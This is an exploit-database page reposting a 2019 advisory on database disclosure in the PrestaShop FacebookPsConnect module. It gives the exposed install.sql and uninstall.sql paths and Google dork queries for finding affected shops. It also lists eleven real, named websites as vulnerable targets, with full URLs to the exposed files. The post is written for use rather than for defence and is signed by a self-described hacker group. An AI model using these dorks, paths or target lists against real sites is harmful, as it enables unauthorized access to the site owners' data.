Advertisement






PrestaShop FacebookPsConnect Modules 1.6.1.4 Database Disclosure

CVE Category Price Severity
N/A CWE-264 Unknown High
Author Risk Exploitation Type Date
Unknown High Remote 2019-01-01
CPE
cpe:cpe:/a:prestashop:facebookpsconnect_modules:1.6.1.4
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019010003

Below is a copy:

PrestaShop FacebookPsConnect Modules 1.6.1.4 Database Disclosure
#################################################################################################

# Exploit Title : PrestaShop FacebookPsConnect Modules 1.6.1.4 Database Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 01/01/2019
# Vendor Homepage : prestashop.com ~ businesstech.fr
# Software Download Link : modulebazaar.com/prestashop-facebook-connect.html
+ sourceforge.net/projects/prestashopfacebookconnect/
# Software Installation Price : 50$
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.4.11.0 ~ 1.5.4.0 ~ 1.5.5.0 ~  1.5.6.1 ~ 1.5.6.2 ~ 1.6.1.4 ~ 1.6.0.9
# Exploit Risk : Medium
# Google Dorks : inurl:''/modules/facebookpsconnect/sql/''
intext:''Firement ralis par Mezcalito''
intext:''Copyright 2018 / PrestaShop. Implented by DGWStudios.com & Design by LeoTheme''
intext:''Copyrights 2012 rygeshop.dk Alle rettigheder forbeholdes''
intext:'' 2018 Powered by Billiandi Creations Ltd''
intext:'' 2013 - Vinta Quatre. Tous droits rservs - Cration Yellow Agence Internet''
intext:'' 2013 oscadi.com''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]  
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
# PacketStormSecurity Exploit Reference Link :
packetstormsecurity.com/files/150903/PrestaShop-FacebookPsConnect-1.6.1.4-Database-Disclosure.html

#################################################################################################

* PrestaShop FacebookPsConnect Modules Install Uninstall Script Database Disclosure

#################################################################################################

# Exploit : 

/modules/facebookpsconnect/sql/install.sql

/modules/facebookpsconnect/sql/uninstall.sql

#################################################################################################

# Example Vulnerable Sites =>

[+] fcgshop.com/modules/facebookpsconnect/sql/install.sql

[+] vinta-quatre.com/modules/facebookpsconnect/sql/install.sql

[+] poemana.com/catalogue/modules/facebookpsconnect/sql/install.sql

[+] lecoindespetits.com/modules/facebookpsconnect/sql/install.sql

[+] dimayori.com.gt/modules/facebookpsconnect/sql/install.sql

[+] shakarababe.com/modules/facebookpsconnect/sql/

[+] neurodigital.es/store/modules/facebookpsconnect/sql/install.sql

[+] rygeshop.dk/modules/facebookpsconnect/sql/install.sql

[+] ultimateparisguide.com/registration/modules/facebookpsconnect/sql/install.sql

[+] dietanat.com/modules/facebookpsconnect/sql/install.sql

[+] margauxlonnberg.com/shop/modules/facebookpsconnect/sql/install.sql

#################################################################################################

# Discovered By Hacker KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.